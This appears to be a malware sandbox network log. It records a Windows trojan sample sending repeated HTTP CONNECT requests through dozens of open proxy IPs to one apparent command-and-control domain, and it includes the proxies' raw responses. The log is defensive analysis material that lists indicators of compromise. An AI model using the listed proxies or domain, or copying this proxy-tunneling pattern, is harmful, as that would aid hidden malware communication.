                                                                                1278192.168.2.85393267.225.255.197632805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.609589100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.085670948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.492043018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.195056915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.585818052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991950035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.389420033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.147531986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.492309093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1279192.168.2.8538883.123.150.19231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.609927893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.783169031 CET165INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: ASP.NET
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1280192.168.2.853783193.151.130.11480865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.611543894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1281192.168.2.851666103.87.170.239326505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.612118959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.426512957 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1282192.168.2.85390746.17.63.16641545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.613101006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.776149988 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1283192.168.2.8539015.9.98.14232335828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.622365952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1284192.168.2.851679148.72.206.250260785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.623944998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.694941998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.753287077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789156914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1285192.168.2.85375114.103.26.5380005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.638778925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.007003069 CET339INHTTP/1.1 500 Internal Server Error
                                                                                Server: nginx/1.19.2
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 177
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.19.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1286192.168.2.853223132.148.245.169387805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.644175053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.694981098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.695493937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789078951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1287192.168.2.853738113.53.29.228136295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.653141022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1288192.168.2.854017198.37.57.112805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.663839102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.761425972 CET503INHTTP/1.1 400 Bad Request
                                                                                Content-Type: text/html; charset=us-ascii
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Connection: close
                                                                                Content-Length: 324
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1289192.168.2.8539343.122.84.9931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.664180040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.857570887 CET165INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: ASP.NET
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1290192.168.2.853908109.69.0.17956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.671591997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1291192.168.2.85394535.185.196.3831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.675394058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.872436047 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1292192.168.2.85386365.1.244.232805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.695895910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.976474047 CET28INHTTP/1.1 502 Bad Gateway


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1293192.168.2.85378527.65.240.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.702805042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1294192.168.2.853843133.18.234.13805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.706387043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.021862984 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                Content-Type: text/html
                                                                                Connection: close
                                                                                Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                Data Ascii: Backend not available


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1295192.168.2.853612208.87.131.151510165828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.710094929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.179387093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.789124966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.882596016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991899967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1296192.168.2.85399618.135.133.11631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.737982035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.901117086 CET167INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1297192.168.2.854009190.14.224.24436295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.775505066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1298192.168.2.853854105.214.71.10356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.783221006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1299192.168.2.85401691.189.177.18931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.795602083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.242954016 CET1286INHTTP/1.1 403 Forbidden
                                                                                Server: squid/5.7
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:35 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 3532
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                Vary: Accept-Language
                                                                                Content-Language: en
                                                                                X-Cache: MISS from lb1
                                                                                X-Cache-Lookup: NONE from lb1:3128
                                                                                Via: 1.1 lb1 (squid/5.7)
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1300192.168.2.85401493.117.72.27557705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.800082922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1301192.168.2.85388061.178.152.3173025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.800178051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.615423918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.965825081 CET90INHTTP/1.1 200 OK
                                                                                Content-Type: application/json
                                                                                Connection: close
                                                                                Content-Length: 55


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1302192.168.2.854041135.181.55.8131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.800215006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1303192.168.2.8539003.37.125.7631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.805994034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.141324997 CET179INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.5.9-1ubuntu4.21
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1304192.168.2.853916223.19.111.185805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.806390047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.491861105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492042065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.398169041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.124202013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
